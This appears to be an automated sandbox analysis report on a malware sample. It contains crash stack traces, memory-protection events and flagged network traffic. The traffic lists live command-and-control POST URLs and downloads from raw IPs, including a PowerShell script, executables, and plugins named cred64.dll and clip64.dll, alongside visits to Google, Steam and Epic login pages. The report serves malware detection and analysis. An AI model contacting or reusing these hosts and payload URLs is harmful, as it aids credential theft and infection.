__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe4d2 0x7ebe0b0 0x7eb862d 0x7eb75a6 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811676 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811684 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 40754692	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe4d2 0x7ebe0b0 0x7eb8645 0x7eb75a6 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811676 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811684 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 42152896	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe4d2 0x7ebe0b0 0x7eb8645 0x7eb75a6 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811676 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811684 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 43551088	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe9da 0x7ebe600 0x7eb862d 0x7eb7693 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811696 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811704 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 40289864	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe9da 0x7ebe600 0x7eb8645 0x7eb7693 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811696 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811704 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 41702468	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebe9da 0x7ebe600 0x7eb8645 0x7eb7693 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811696 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811704 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 43103416	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebf9af 0x7ebf181 0x7eb5fc4 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2812608 registers.edi: 2812888 registers.eax: 0 registers.ebp: 2812616 registers.edx: 0 registers.ebx: 2814372 registers.esi: 43670912 registers.ecx: 43677996	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://193.233.255.73/loghub/master
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.124.1/theme/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.249/fuza/2.ps1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.249/fuza/tus.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.249/fuza/foto1661.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.249/fuza/salo.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.1/theme/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.1/theme/Plugins/clip64.dll

Performs some HTTP requests (50 out of 106 events)

request	POST http://193.233.255.73/loghub/master
request	POST http://77.91.124.1/theme/index.php
request	GET http://77.91.68.249/fuza/2.ps1
request	GET http://77.91.68.249/fuza/tus.exe
request	GET http://77.91.68.249/fuza/foto1661.exe
request	GET http://77.91.68.249/fuza/salo.exe
request	GET http://77.91.124.1/theme/Plugins/cred64.dll
request	GET http://77.91.124.1/theme/Plugins/clip64.dll
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywosNhdGsuZdVCndGpS2K_jZJeHBslOkGyM_5Abhb0zccwpk0a_EpRThKNdW8KNTJvRtoAJFA
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxHmAuJ7cTrlJwP83uTJIwZEOmrXGcYW_i0uz5KMlDH1JsRYBc2MmUHjR6ye20L2fYuNPufuw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S537282805%3A1698980634624638
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyyidh94t-7_letWPwvjNQfl6I8TMheIR3px7R79ys-v-C3n_ey4IpHEeEFVPcsdPA92mVFQPw
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxa6sAB10RaHTDUTJBO3-eoyqwGJOMg6fq-JIxFpsnqcBSN8g6aim1IDWZ3iP__yBBnia-T&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S1879541505%3A1698980644017236
request	GET https://steamcommunity.com/openid/loginform/
request	GET https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=Vbm1kuHoXmMB&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
request	GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
request	GET https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
request	GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
request	GET https://www.epicgames.com/id/login
request	GET https://accounts.google.com/_/bscframe
request	GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.520a7eda.chunk.js
request	GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.10a25667.chunk.js
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=tSnvragsq7Tn&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=8BlFIKwdZV37&l=english&_cdn=cloudflare
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015
request	GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

Sends data using the HTTP POST Method (2 events)

request	POST http://193.233.255.73/loghub/master
request	POST http://77.91.124.1/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 5152 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f2b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00427000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e5a000 process_handle: 0xffffffff	1
